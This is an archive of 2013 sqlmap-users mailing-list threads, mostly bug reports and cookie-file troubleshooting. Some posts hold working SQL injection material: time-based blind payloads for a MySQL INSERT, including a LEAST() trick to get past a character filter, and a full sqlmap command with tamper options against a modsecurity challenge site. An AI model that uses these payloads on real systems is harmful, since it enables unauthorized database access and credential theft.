I changed the sqlmap payload by using LEAST(), which became this:

',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('

Is this something sqlmap can currently do?
Or maybe there's a better solution for it?
Or should I implement it? (never looked at the sqlmap code, but might 
be fun to start digging into).

Cheers for now!


On 2013-06-01 21:57, du...@al... wrote:
> Hey guys, I have a server at work where there's an SQLi in an INSERT,
> but I can't prove that it's actually a threat so far due to a little
> "filter" that replaces some input characters.
> I crafted a little injection that injects a sleep into the insert, and
> makes it sleep for 10 seconds, and then doesn't insert anything (due 
> to
> a duplicate error that I made sure to get).
> 
> The original query looks like this:
> 
> insert into discount_phone_registry (phone_nbr,reg_date) values
> ('111',date(now()));.
> And the injection is in the phone_nbr, so I made the following
> injection: 111',(SLEEP(10))),('111
> And it then becomes: insert into discount_phone_registry
> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
> So, so far so good, right?
> 
> Well when I wanted to use sqlmap, I noticed that our filter is doing
> some stupid things ^^
> This is the payload from sqlmap
> 
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
> 
> But as it gets submitted in the form, it becomes
> 
> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
> 
> Notice how the > became a _
> The tampering scripts I'm using are space2comment and charencode, and
> charencode actually seems to trick it, since I'm getting the 
> less/grater
> char in the error output from the web server now.
> If I copy/paste the payload directly from the web server error output,
> directly into the MySQL client and run it, it works.
> 
> Is there anything else I can try to get this to work?
> 
> PS: If it helps I just noticed this!
> 
> 1064 - You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use
> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
> insert into discount_phone_registry (phone_nbr,reg_date) values
> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
> 
> Notice how it complains on ";16" which is probably the encoded > sign
> (&gt;).
> 
> Thanks in advance! :-)
> 
> 
> 
> 
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] Server replaces some chars

[<du...@al...>]

Hey guys, I have a server at work where there's an SQLi in an INSERT, 
but I can't prove that it's actually a threat so far due to a little 
"filter" that replaces some input characters.
I crafted a little injection that injects a sleep into the insert, and 
makes it sleep for 10 seconds, and then doesn't insert anything (due to 
a duplicate error that I made sure to get).

The original query looks like this:

insert into discount_phone_registry (phone_nbr,reg_date) values 
('111',date(now()));.
And the injection is in the phone_nbr, so I made the following 
injection: 111',(SLEEP(10))),('111
And it then becomes: insert into discount_phone_registry 
(phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
So, so far so good, right?

Well when I wanted to use sqlmap, I noticed that our filter is doing 
some stupid things ^^
This is the payload from sqlmap

111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('

But as it gets submitted in the form, it becomes

111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('

Notice how the > became a _
The tampering scripts I'm using are space2comment and charencode, and 
charencode actually seems to trick it, since I'm getting the less/grater 
char in the error output from the web server now.
If I copy/paste the payload directly from the web server error output, 
directly into the MySQL client and run it, it works.

Is there anything else I can try to get this to work?

PS: If it helps I just noticed this!

1064 - You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use 
near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
insert into discount_phone_registry (phone_nbr,reg_date) values 
('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))

Notice how it complains on ";16" which is probably the encoded > sign 
(&gt;).

Thanks in advance! :-)

Re: [sqlmap-users] Old modsecurity challange

[Miroslav S. <mir...@gm...>]

Hi Marcell.

And what makes you think that you are not getting right results? There
results you've sent look quite right.

Kind regards,
Miroslav Stampar


On Fri, May 31, 2013 at 10:34 AM, Marcell Fodor <fod...@gm...>wrote:

> Heya,
>
> I had some time to play arround with and old medsecurity challange here:
> http://www.modsecurity.org/zero.webappsecurity.com/
>
> I did make this work under sqlmap:
>
> python ./sqlmap.py -u "
> http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data
> "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
> --string "Object moved" --technique "b" --dbms "msaccess" --tamper
> "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
> rv:21.0) Gecko/20100101 Firefox/21.0"
>
> I had to remove %0C from space2randomblank to make this work.
>
> Response:
>
> Place: (custom) POST
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
> 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
> --
>
> Is the challange way outdated or something I do wrong?
>
> M
>
>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[Miroslav S. <mir...@gm...>]

Hi.

This should be "patched" now.

Bye


On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>
>    Could you help me with this bug ?
>
>
> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ***********************************************
> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
> SQL Server --users --passwords
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap", line 87, in main
> start()
> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
> action()
> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
> conf.dbmsHandler.getPasswordHashes(), "password hash",
> CONTENT_TYPE.PASSWORDS)
> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
> getPasswordHashes
> if user in retrievedUsers:
> TypeError: unhashable type: 'list'
>
> [*] shutting down at 22:54:12
> Thanks
>
> BOB
>
>
>
>
> ------------------ Original ------------------
> *From: * "sqlmap-users-request"<sql...@li...
> >;
> *Date: * May 29, 2013
> *To: * "sqlmap-users"<sql...@li...>;
> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>
> Send sqlmap-users mailing list submissions to
> sql...@li...
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> or, via email, send a message with subject or body 'help' to
> sql...@li...
>
> You can reach the person managing the list at
> sql...@li...
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of sqlmap-users digest..."
>
>
> Today's Topics:
>
>    1. Re: Feature request (David Guimaraes)
>    2. Re: --load-cookies (Dirk Wetter)
>    3. Re: --load-cookies (Miroslav Stampar)
>    4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>       (Miroslav Stampar)
>    5. Re: --load-cookies (Dirk Wetter)
>    6. --host parameter (co...@5i...)
>    7. Sqlmap and direct connect error (???????? ??????)
>    8. Re: --host parameter (Miroslav Stampar)
>    9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>   10. feature request: offline mode for --dns-domain? (buawig)
>   11. feature request: --dns-domain for non-root users (--dns-port)
>       (buawig)
>   12. Domain credentials (Brian Milliron)
>   13. Re: Domain credentials (Brandon Perry)
>   14. Re: feature request: offline mode for --dns-domain?
>       (Miroslav Stampar)
>   15. Re: Domain credentials (Miroslav Stampar)
>   16. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (buawig)
>   17. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (Miroslav Stampar)
>   18. MySQL error based technique bug (Konrads Smelkovs)
>   19. Re: MySQL error based technique bug (Miroslav Stampar)
>   20. SQLmap crashing (Phillip Wylie)
>   21. Re: SQLmap crashing (Miroslav Stampar)
>   22. Custom injection payload in POST (Marcell Fodor)
>   23. Re: SQLmap crashing (Miroslav Stampar)
>   24. I got error on windows (warezhacking)
>   25. Appending to a dump (Stephen Shkardoon)
>   26. Re: Appending to a dump (Miroslav Stampar)
>   27. Re: Appending to a dump (Stephen Shkardoon)
>   28. Re: Appending to a dump (Miroslav Stampar)
>   29. --ignore-404 ? (buawig)
>   30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (buawig)
>   31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   33. Re: --ignore-404 ? (Miroslav Stampar)
>   34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>   35. Re: BUG...!!!! o.O (Miroslav Stampar)
>   36. gun...@gm... wants to follow you. Accept?
>       (gun...@gm...)
>   37. Direct access to mysql database (Marcell Fodor)
>   38. Re: Direct access to mysql database (Miroslav Stampar)
>   39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>       (Badoo)
>   40. Not getting any sensitive data from database (Marcell Fodor)
>   41. Re: Not getting any sensitive data from database
>       (Miroslav Stampar)
>   42. unhandled exception (kvasilopoulos)
>   43. [SQLMAP] Unhandled exception for IPv6
>       (e.n...@st...)
>   44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   45. Re: unhandled exception (Miroslav Stampar)
>   46. Passing SOAPAction in --header (Brandon Perry)
>   47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>   48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   49. Blind SQL Injection question (Guy Dufour)
>   50. Re: Blind SQL Injection question (Chris Oakley)
>   51. Re: Passing SOAPAction in --header (Brandon Perry)
>   52. Re: Passing SOAPAction in --header (Brandon Perry)
>   53. Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   57. SQLMAP Bug (Joe O'Hara)
>   58. Re: SQLMAP Bug (Miroslav Stampar)
>   59. [CRITICAL] (Thai Thao)
>   60. Re: [CRITICAL] (Miroslav Stampar)
>   61. Providing multiple dbms (Sebastian Nerz)
>   62. Re: Providing multiple dbms (Miroslav Stampar)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 13 Apr 2013 21:40:39 -0300
> From: David Guimaraes <sk...@gm...>
> Subject: Re: [sqlmap-users] Feature request
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CAJ...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Good question Miroslav.. I tried to think in something that can be
> implemented without ruin sqlmap query schema, but I could not come to any
> conclusion... =(
>
> The thing is, sqlsus use a different approch to dump the data, making this
> kind of thing possible...
>
> The solution that I found in this particular scenario is to use sqlsus,
> unfortunately...
>
> Regards.
>
> David
>
>
> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
> mir...@gm...
> > wrote:
>
> > Hi David.
> >
> > And what do you recommend to be done in case of query with length >
> > max_inj_length?
> >
> > Kind regards,
> > Miroslav Stampar
> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
> >
> >> Hi, I am trying to perform sql injection on a web site but I can not get
> >> successful due to a size limitation on the query sent to the server. The
> >> server is limiting the size of query in 512 bytes only and sqlmap do not
> >> have any customization that allows me to bypass this restriction like
> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
> "autoconf"
> >> that measure the permited query size.
> >>
> >> There is some chance to put this kind of feature in sqlmap?
> >>
> >> Thanks.
> >>
> >> --
> >> David Gomes Guimar?es
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
> >> Rise to greatness in Intel's independent game demo contest.
> >> Compete for recognition, cash, and the chance to get your game
> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
>
>
> --
> David Gomes Guimar?es
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 2
> Date: Mon, 15 Apr 2013 11:36:37 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
> 333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 15 Apr 2013 11:45:19 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Dirk Wetter <sp...@dr...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your
> needs?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
> >
> >
> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > > Nevertheless, with the latest commit that check should be "neutralized"
> > now. Could you please retry it now?
> >
> > thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> > hiccups, using the same file:
> >
> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
> bug!
> > Traceback (most recent call last):
> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> > _really_load
> >     assert domain_specified == initial_dot
> > AssertionError
> >
> >   _warn_unhandled_exception()
> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> >
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> > the 999.. looks strange to me.
> >
> > >
> > >
> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> > mir...@gm... <mailto:mir...@gm...>> wrote:
> > >
> > >     Hi Dirk.
> > >
> > >     Well, I would say that you have an expired cookie. Do you see that
> > value 0? That value should be a valid UNIX time representing time of
> cookie
> > expiration. Also, I've just tested that cookie of yours and sqlmap says:
> > "[WARNING] cookie '....' has expired"
> > >
> >
> > that's true but IMO 0 represents just a session cookie. Example:
> >
> > prompt% wget -q -O /dev/null --keep-session-cookies
> > --save-cookies=/dev/stdout bing.com
> > # HTTP cookie file.
> > # Generated by Wget on 2013-04-15 11:23:13.
> > # Edit at your own risk.
> >
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> > AUTOREDIR=0&GEOVAR=&DOB=20130415
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> > D=2781203&MS=2781203&AF=NOFORM
> > .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> >  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> > .bing.com       TRUE    /       FALSE   1429089794      MUID
> >  333995A69E06630B2EB491169F016314
> > .bing.com       TRUE    /       FALSE   0       _SS
> > SID=B954CB7EDF8643CABAD8013F27A241E7
> > .bing.com       TRUE    /       FALSE   0       _HOP
> > .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> > .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> > www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> > www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> > 333995A69E06630B2EB491169F016314
> >
> > prompt%
> >
> > Same parser problem btw if I edit the cookie file and put 1429089794 unix
> > time instead of 0 in there.
> >
> > Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> > but cookies w/ expiration date) and uses the last
> > cookie only for the first 120 tries.
> >
> > Cheers, Dirk
> >
> >
> > >
> > >     Kind regards,
> > >     Miroslav Stampar
> > >
> > >
> > >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
> <mailto:
> > sp...@dr...>> wrote:
> > >
> > >
> > >         Hi Miroslav,
> > >
> > >         thx for your prompt answer.
> > >
> > >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > >         > Hi Dirk.
> > >         >
> > >         > Could you please get the latest revision and retry it again?
> > >         ed5599f: almost the same: with cookie in the header sqlmap
> takes
> > only this one.
> > >         The slight difference seems to be that in the case where I
> > didn't supply a cookie
> > >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> > the server anymore.
> > >         >
> > >         > There was a situation where info messages have been wrongly
> > written that original response contained Set-Cookie in situations like
> > yours.
> > >         >
> > >         > In case that everything stays as it is, I'll need to ask you
> > to provide more details. For example, cookie file would be great.
> > >
> > >         sure, here you go:
> > >
> > >         --snip
> > >         # Netscape HTTP Cookie File
> > >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> >  \t  <Cookie>
> > >         [..]
> > >         --snap
> > >
> > >         They are all session cookies. For easier reading here I put
> some
> > blanks in the line
> > >         above, in "cookie-file" there aren't any though. Cookies were
> > generated with
> > >         stompy and a shell script (looks he same as with
> > >         wget -S -O /dev/null --keep-session-cookies
> > --save-cookies=<file> <URL>)
> > >
> > >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> > file ;-)
> > >
> > >         >
> > >         > Also, please make sure that the cookie file contains proper
> > cookie(s) - domain name should be the same as a domain of target, cookie
> > needs to have a proper valid time, etc.
> > >
> > >         see above.
> > >
> > >         Cheers,
> > >
> > >         Dirk
> > >
> > >         >
> > >         >
> > >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>>> wrote:
> > >         >
> > >         >     Hi Miroslav,
> > >         >
> > >         >     yes unfortunately.
> > >         >
> > >         >     If I omit the cookie line in the request header
> > completely, sqlmap
> > >         >     seems to take the first cookie issued by the server with
> > set-cookie (and
> > >         >     put's it silently in).
> > >         >
